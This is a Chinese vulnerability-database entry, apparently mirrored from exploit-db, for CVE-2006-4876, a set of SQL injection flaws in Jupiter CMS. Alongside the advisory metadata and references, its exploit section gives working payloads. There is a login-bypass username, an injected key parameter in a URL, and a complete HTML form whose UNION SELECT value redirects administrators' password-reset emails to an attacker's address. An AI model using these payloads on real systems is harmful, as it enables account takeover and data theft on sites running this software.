Jupiter CMS 多个SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111042 漏洞类型 SQL注入
发布时间 2006-09-15 更新时间 2006-09-28
CVE编号 CVE-2006-4876 CNNVD-ID CNNVD-200609-315
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/28586
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-315
|漏洞详情
JupiterCMS中存在多个SQL注入漏洞,远程攻击者可以通过(1)登录期间的用户名,或modules/register中的(2)key或(3)fpwusername参数执行任意SQL命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/20048/info
     
Jupiter CMSA is prone to multiple input-validation vulnerabilities, including cross-site scripting, SQL-injection, and arbitrary file-upload issues, because the application fails to sanitize user-supplied input. 
     
A successful exploit of these vulnerabilities could allow an attacker to compromise the application, access or modify data, steal cookie-based authentication credentials, exploit vulnerabilities in the underlying database implementation, or upload and execute arbitrary files within the webserver process. Other attacks are also possible.
 
if magic_quotes_gpc = off login with user name : ' or id=1/* or ' or authorization = 4/* 
index.php?n=http://www.example.com/modules/register&a=3&d=3&key='%20or%20id=1/* 
You will be able to change the password for any user .. know his id and put it in the url. -- or you can use this form by changing http://localhost/jupiter/ to the website dir to recive reset password email to all the administrators <form method="post" action="http://localhost/jupiter/index.php?n=http://www.example.com/modules/register"> <table class="main" cellspacing="1" cellpadding="4" width="100%"> <tr class="head"> <td colspan="2" class="head">Forgot your password?</td> </tr> <tr> <td class="con1" width="42%" valign="middle"><span class="hilight">Username:</span></td> <td class="con1" width="58%" valign="bottom"><input type="text" name="fpwusername" style="width:100%" class="box" tabindex="5" value="' union select id,authorization ,username ,password ,'security@soqor.net',url,age,flag,location,registered,lastvisit,forum_lastvisit,ip,forumposts,signature,aboutme,msn,yahoo,icq,aim,skype,avatar,hideemail,templates,ca lendarbday,status,multikey,actime from users where id=1or authorization=4/*"></td> </tr> <tr> <td class="con1"><input type="button" style="width:100" class="box" value="Back" onClick="window.history.go(-1);" tabindex="8"></td> <td class="con1" align="right"><input type="submit" style="width:100" class="box" value="Submit" tabindex="7"></td> </tr> <input type="hidden" name="a" value="3"> <input type="hidden" name="d" value="1"> </table> </form> put the user name value Change security@soqor.net to your email ' union select id,authorization ,username ,password ,'security@soqor.net',url,age,flag,location,registered,lastvisit,forum_lastvisit,ip,forumposts,signature,aboutme,msn,yahoo,icq,aim,skype,avatar,hideemail,templates,ca lendarbday,status,multikey,actime from users where id=1or authorization=4/*
|参考资料

来源:BID
名称:20048
链接:http://www.securityfocus.com/bid/20048
来源:BUGTRAQ
名称:20060915JupiterCMSMultipleinjections
链接:http://www.securityfocus.com/archive/1/archive/1/446064/100/0/threaded
来源:SREASON
名称:1608
链接:http://securityreason.com/securityalert/1608